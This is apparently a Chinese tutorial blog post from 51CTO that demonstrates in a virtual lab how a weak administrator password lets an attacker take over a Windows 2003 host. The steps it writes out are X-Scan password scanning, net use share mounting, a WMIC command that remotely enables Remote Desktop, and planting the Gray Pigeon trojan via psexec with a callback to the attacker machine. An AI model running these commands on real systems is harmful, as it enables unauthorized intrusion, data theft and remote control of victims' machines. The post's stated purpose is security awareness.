弱口令

加固網絡安全是網絡管理人員的重要工作,口令滿足複雜性是最基本的要求,但很多管理員對弱口令嗤之以鼻,認爲沒什麼大不了?不見棺材不掉淚,一步一步直搗黃龍……
     實驗環境:vm6.51(windows2003+winxp),如圖:
 
image
第一招:掃你沒商量
           工具:x-scan-v3.3,在winxp上打開xcan,設置|掃描參數,輸入要掃描的主機:192.168.10.1,確定。
image 
         單擊開始掃描,xcan將會對192.168.10.1這臺主機開始全方位掃描:
image 
      掃描完成,xscan將會以網頁形勢報告掃描信息,將會看到管理員口令:
image 
第二招:你的數據我做主
      開始|運行:CMD.出現命令提示符,輸入net use
\\192.168.10.1\ipc$ qwert /user:administrator
                                                          net use x:
\\192.168.10.1\c$

image 
     打開我的電腦|x:,對方數據一覽無餘:
image 
第三招:開你遠程,你的電腦我用用
         測試遠程桌面是否開啓,連接失敗:
image 
    開始|運行:cmd,輸入代碼:Wmic /node:192.168.10.1 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1,輸入管理員口令:
image 
   再遠程桌面連接,開始|遠行:mstsc,連接成功:
image 
第四招:種個***,神不知鬼不覺
           打開灰鴿子,點擊配置服務程序,ip通知:192.168.10.2,保存路徑爲c:\,點成生成服務器端:
image 
        拷貝工具軟件psexec.exe到c:\:
image 
       開始運行,輸入以下命令,點擊agree,如圖:
image 
       打開灰鴿子程序,發現192.168.10.1已上線:
image 
    發個信息警言一下:
image 
看一下結果:
image 
網絡安全教育演示用,弱口令真的很危險!!! 

本文出自 “IT動手實驗營” 博客,請務必保留此出處http://netwj.blog.51cto.com/715492/229240
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章